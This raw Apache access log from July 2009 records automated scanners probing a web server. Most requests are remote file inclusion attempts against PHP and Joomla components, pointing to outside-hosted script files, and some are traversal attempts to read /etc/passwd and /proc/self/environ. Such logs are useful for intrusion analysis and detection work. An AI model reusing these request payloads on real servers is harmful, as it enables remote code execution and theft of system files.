124.0.145.1 - - [18/Jul/2009:03:42:26 -0400] "GET /logs/access_log.Q109061200//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Jul/2009:03:42:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.57.78.8 - - [18/Jul/2009:03:42:55 -0400] "GET /logs/access_log.Q109051400/akocomments.php?mosConfig_absolute_path=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:03:43:35 -0400] "GET /logs/access_log.Q109063000%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:03:43:36 -0400] "GET /logs/access_log.Q109063000%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:44:04 -0400] "GET /////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt????? HTTP/1.1" 200 455 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:44:04 -0400] "GET /logs/access_log.Q109051800/////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt????? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:44:04 -0400] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt????? HTTP/1.1" 200 10002 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:44:10 -0400] "GET /logs/access_log.Q109060100/////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt????? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
201.232.54.48 - - [18/Jul/2009:03:44:28 -0400] "GET /////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt??? HTTP/1.1" 200 455 "-" "Mozilla/5.0"
201.232.54.48 - - [18/Jul/2009:03:44:28 -0400] "GET /logs/access_log.Q109051800/////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
201.232.54.48 - - [18/Jul/2009:03:44:28 -0400] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt??? HTTP/1.1" 200 10002 "-" "Mozilla/5.0"
201.232.54.48 - - [18/Jul/2009:03:44:32 -0400] "GET /logs/access_log.Q109060100/////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
110.45.145.92 - - [18/Jul/2009:03:44:35 -0400] "GET //com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.hair.gr/fx29id.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
110.45.145.92 - - [18/Jul/2009:03:44:35 -0400] "GET /logs//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.hair.gr/fx29id.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
110.45.145.92 - - [18/Jul/2009:03:44:35 -0400] "GET /logs/access_log.Q109052600%20%20//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.hair.gr/fx29id.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
110.45.145.92 - - [18/Jul/2009:03:44:35 -0400] "GET /logs/access_log.Q109050800%20%20//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.hair.gr/fx29id.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:44:57 -0400] "GET /logs/access_log.Q109051800%20%20/////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt????? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:44:57 -0400] "GET /logs/access_log.Q109060100%20%20/////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt????? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
110.45.145.92 - - [18/Jul/2009:03:45:59 -0400] "GET /logs/access_log.Q109052600//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.hair.gr/fx29id.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
110.45.145.92 - - [18/Jul/2009:03:45:59 -0400] "GET /logs/access_log.Q109050800//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.hair.gr/fx29id.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
221.143.51.115 - - [18/Jul/2009:03:46:04 -0400] "GET /logs/access_log.Q109070200/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
221.143.51.115 - - [18/Jul/2009:03:46:06 -0400] "GET /wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
221.143.51.115 - - [18/Jul/2009:03:46:07 -0400] "GET /logs/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
59.24.49.35 - - [18/Jul/2009:03:46:21 -0400] "GET //com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.racingbikesrl.com/modules/fx29id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
59.24.49.35 - - [18/Jul/2009:03:46:21 -0400] "GET /logs//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.racingbikesrl.com/modules/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
59.24.49.35 - - [18/Jul/2009:03:46:22 -0400] "GET /logs/access_log.Q109052600%20%20//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.racingbikesrl.com/modules/fx29id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:03:46:25 -0400] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:03:46:25 -0400] "GET /logs/error_log.Q109063000//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:03:46:25 -0400] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
151.1.153.1 - - [18/Jul/2009:03:46:27 -0400] "GET /logs/access_log.Q109070600//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
151.1.153.1 - - [18/Jul/2009:03:46:27 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
151.1.153.1 - - [18/Jul/2009:03:46:27 -0400] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
151.1.153.1 - - [18/Jul/2009:03:46:28 -0400] "GET /logs/access_log.Q109052800//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
114.32.40.221 - - [18/Jul/2009:03:46:34 -0400] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:03:46:34 -0400] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:03:46:34 -0400] "GET /logs/error_log.Q109063000//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
59.24.49.35 - - [18/Jul/2009:03:46:40 -0400] "GET //com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.racingbikesrl.com/modules/fx29id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
59.24.49.35 - - [18/Jul/2009:03:46:40 -0400] "GET /logs/access_log.Q109052600%20%20//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.racingbikesrl.com/modules/fx29id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
59.24.49.35 - - [18/Jul/2009:03:46:40 -0400] "GET /logs//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.racingbikesrl.com/modules/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:47:00 -0400] "GET //includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:47:00 -0400] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//id1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
59.24.49.35 - - [18/Jul/2009:03:47:10 -0400] "GET /logs/access_log.Q109050800//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.racingbikesrl.com/modules/fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
59.24.49.35 - - [18/Jul/2009:03:47:10 -0400] "GET /logs/access_log.Q109052600//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.racingbikesrl.com/modules/fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Jul/2009:03:47:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
59.24.49.35 - - [18/Jul/2009:03:47:35 -0400] "GET /logs/access_log.Q109052600//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.racingbikesrl.com/modules/fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
59.24.49.35 - - [18/Jul/2009:03:47:39 -0400] "GET /logs/access_log.Q109050800//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.racingbikesrl.com/modules/fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:03:47:59 -0400] "GET /logs/error_log.Q109063000%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
141.223.5.11 - - [18/Jul/2009:03:48:01 -0400] "GET /logs/access_log.Q109052600//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.hair.gr/v8id.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
141.223.5.11 - - [18/Jul/2009:03:48:01 -0400] "GET /logs/access_log.Q109052600//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.hair.gr/ramaid.txt???? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
141.223.5.11 - - [18/Jul/2009:03:48:01 -0400] "GET //com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.hair.gr/v8id.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
141.223.5.11 - - [18/Jul/2009:03:48:01 -0400] "GET //com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.hair.gr/ramaid.txt???? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
141.223.5.11 - - [18/Jul/2009:03:48:02 -0400] "GET /logs//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.hair.gr/v8id.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
141.223.5.11 - - [18/Jul/2009:03:48:02 -0400] "GET /logs//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.hair.gr/ramaid.txt???? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
216.117.172.131 - - [18/Jul/2009:03:48:07 -0400] "GET /logs/error_log.Q109063000%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
201.232.54.48 - - [18/Jul/2009:03:48:22 -0400] "GET /logs/access_log.Q109051800%20%20/////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
218.237.66.229 - - [18/Jul/2009:03:48:29 -0400] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
218.237.66.229 - - [18/Jul/2009:03:48:29 -0400] "GET /logs/error_log.Q109063000//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
218.237.66.229 - - [18/Jul/2009:03:48:29 -0400] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
201.232.54.48 - - [18/Jul/2009:03:48:30 -0400] "GET /logs/access_log.Q109060100%20%20/////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
83.96.135.55 - - [18/Jul/2009:03:48:32 -0400] "GET /logs/access_log.Q109063000%20%20/akocomments.php?mosConfig_absolute_path=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
210.110.97.12 - - [18/Jul/2009:03:48:37 -0400] "GET /logs/access_log.Q109070300//vwar/backup/errors.php?error=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.65"
210.110.97.12 - - [18/Jul/2009:03:48:38 -0400] "GET //vwar/backup/errors.php?error=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.65"
210.110.97.12 - - [18/Jul/2009:03:48:38 -0400] "GET /logs//vwar/backup/errors.php?error=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.65"
201.232.54.48 - - [18/Jul/2009:03:48:46 -0400] "GET /////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt??? HTTP/1.1" 200 455 "-" "Mozilla/5.0"
201.232.54.48 - - [18/Jul/2009:03:48:46 -0400] "GET /logs/access_log.Q109051800/////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
201.232.54.48 - - [18/Jul/2009:03:48:46 -0400] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt??? HTTP/1.1" 200 10002 "-" "Mozilla/5.0"
201.232.54.48 - - [18/Jul/2009:03:48:54 -0400] "GET /logs/access_log.Q109060100/////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:03:49:13 -0400] "GET /logs/access_log.Q109063000%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
221.143.51.115 - - [18/Jul/2009:03:49:24 -0400] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
206.225.23.4 - - [18/Jul/2009:03:49:32 -0400] "GET //includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:49:32 -0400] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//id1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:49:32 -0400] "GET /logs/access_log.Q109061200%20%20//includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:49:36 -0400] "GET /logs/access_log.Q109061200%20%20//includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
83.96.135.55 - - [18/Jul/2009:03:49:38 -0400] "GET /logs/access_log.Q109051400%20%20/akocomments.php?mosConfig_absolute_path=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:03:49:39 -0400] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:03:49:39 -0400] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:03:49:40 -0400] "GET /logs/access_log.Q109070200/ncaster/admin/addons/archive/archive.php?adminfolder=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:03:49:40 -0400] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:03:49:40 -0400] "GET /logs/access_log.Q109070200/ncaster/admin/addons/archive/archive.php?adminfolder=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:03:49:41 -0400] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
151.1.153.1 - - [18/Jul/2009:03:49:46 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 276 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
151.1.153.1 - - [18/Jul/2009:03:49:47 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 249 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.117.172.131 - - [18/Jul/2009:03:49:47 -0400] "GET /logs/access_log.Q109063000//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:03:50:00 -0400] "GET /logs/access_log.Q109070600/ncaster/admin/addons/archive/archive.php?adminfolder=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:03:50:02 -0400] "GET /logs/access_log.Q109070600/ncaster/admin/addons/archive/archive.php?adminfolder=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
141.223.5.12 - - [18/Jul/2009:03:50:10 -0400] "GET /logs/access_log.Q109052600//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.hair.gr/aldiid.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
141.223.5.12 - - [18/Jul/2009:03:50:10 -0400] "GET //com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.hair.gr/aldiid.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
141.223.5.12 - - [18/Jul/2009:03:50:10 -0400] "GET /logs//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.hair.gr/aldiid.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
141.223.5.11 - - [18/Jul/2009:03:50:41 -0400] "GET /logs/error_log.Q109052600//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.hair.gr/v8id.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.79"
141.223.5.11 - - [18/Jul/2009:03:50:42 -0400] "GET /logs/error_log.Q109052600//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.hair.gr/ramaid.txt???? HTTP/1.1" 404 268 "-" "libwww-perl/5.79"
206.225.23.4 - - [18/Jul/2009:03:50:49 -0400] "GET /logs/access_log.Q109062400%20%20//includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:50:54 -0400] "GET /logs/access_log.Q109062400%20%20//includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
151.1.153.1 - - [18/Jul/2009:03:51:00 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 276 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
141.223.5.12 - - [18/Jul/2009:03:51:01 -0400] "GET //com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.hair.gr/aldiid.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
141.223.5.12 - - [18/Jul/2009:03:51:10 -0400] "GET /logs/error_log.Q109052600//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.hair.gr/aldiid.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.79"
74.223.143.131 - - [18/Jul/2009:03:51:15 -0400] "GET /logs/access_log.Q109070200%20%20/ncaster/admin/addons/archive/archive.php?adminfolder=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
203.57.78.8 - - [18/Jul/2009:03:51:16 -0400] "GET /logs/access_log.Q109063000%20%20/akocomments.php?mosConfig_absolute_path=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:03:51:19 -0400] "GET /logs/access_log.Q109070200%20%20/ncaster/admin/addons/archive/archive.php?adminfolder=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:51:23 -0400] "GET /logs/access_log.Q109070100%20%20//includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:03:51:26 -0400] "GET /logs/access_log.Q109070600%20%20/ncaster/admin/addons/archive/archive.php?adminfolder=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:03:51:29 -0400] "GET /logs/access_log.Q109070600%20%20/ncaster/admin/addons/archive/archive.php?adminfolder=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:03:51:29 -0400] "GET /logs/access_log.Q109070100%20%20//includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Jul/2009:03:52:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.2.194.146 - - [18/Jul/2009:03:53:28 -0400] "GET /logs/index2.php?ID=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 213 "-" "XXXXXX"
62.2.194.146 - - [18/Jul/2009:03:53:28 -0400] "GET /logs/access_log.Q109071000/index2.php?ID=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 235 "-" "XXXXXX"
62.2.194.146 - - [18/Jul/2009:03:53:28 -0400] "GET /index2.php?ID=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 208 "-" "XXXXXX"
62.2.194.146 - - [18/Jul/2009:03:53:28 -0400] "GET /logs/index2.php?ID=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "XXXXXX"
62.2.194.146 - - [18/Jul/2009:03:53:28 -0400] "GET /logs/access_log.Q109071000/index2.php?ID=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "XXXXXX"
62.2.194.146 - - [18/Jul/2009:03:53:28 -0400] "GET /index2.php?ID=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "XXXXXX"
122.153.28.140 - - [18/Jul/2009:03:55:14 -0400] "GET //////?_SERVER%5BDOCUMENT_ROOT%5D]=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 200 456 "-" "Mozilla/5.0"
122.153.28.140 - - [18/Jul/2009:03:55:17 -0400] "GET /logs/access_log.Q109052900%20%20//////?_SERVER%5BDOCUMENT_ROOT%5D]=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
122.153.28.140 - - [18/Jul/2009:03:55:18 -0400] "GET /logs//////?_SERVER%5BDOCUMENT_ROOT%5D]=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 200 10003 "-" "Mozilla/5.0"
122.153.28.140 - - [18/Jul/2009:03:55:28 -0400] "GET /logs/access_log.Q109052900%20%20//////?_SERVER%5BDOCUMENT_ROOT%5D]=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
122.153.28.140 - - [18/Jul/2009:03:55:28 -0400] "GET //////?_SERVER%5BDOCUMENT_ROOT%5D]=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 200 456 "-" "Mozilla/5.0"
122.153.28.140 - - [18/Jul/2009:03:55:28 -0400] "GET /logs//////?_SERVER%5BDOCUMENT_ROOT%5D]=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 200 10003 "-" "Mozilla/5.0"
69.10.63.163 - - [18/Jul/2009:03:55:51 -0400] "GET //////?_SERVER%5BDOCUMENT_ROOT%5D]=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 200 456 "-" "Mozilla/5.0"
69.10.63.163 - - [18/Jul/2009:03:55:51 -0400] "GET /logs/access_log.Q109052800//////?_SERVER%5BDOCUMENT_ROOT%5D]=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.10.63.163 - - [18/Jul/2009:03:55:51 -0400] "GET /logs//////?_SERVER%5BDOCUMENT_ROOT%5D]=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 200 10003 "-" "Mozilla/5.0"
115.92.96.43 - - [18/Jul/2009:03:56:10 -0400] "GET //vwar/backup/errors.php?error=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
69.10.63.163 - - [18/Jul/2009:03:56:32 -0400] "GET /logs/access_log.Q109052900//////?_SERVER%5BDOCUMENT_ROOT%5D]=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:03:56:45 -0400] "GET /logs/error_log.Q109063000%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
221.143.51.115 - - [18/Jul/2009:03:56:51 -0400] "GET //vwar/backup/errors.php?error=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.79"
62.2.194.146 - - [18/Jul/2009:03:56:52 -0400] "GET /logs/access_log.Q109062200/index2.php?ID=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 235 "-" "XXXXXX"
62.2.194.146 - - [18/Jul/2009:03:56:52 -0400] "GET /logs/access_log.Q109062200/index2.php?ID=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "XXXXXX"
151.1.153.1 - - [18/Jul/2009:03:57:18 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
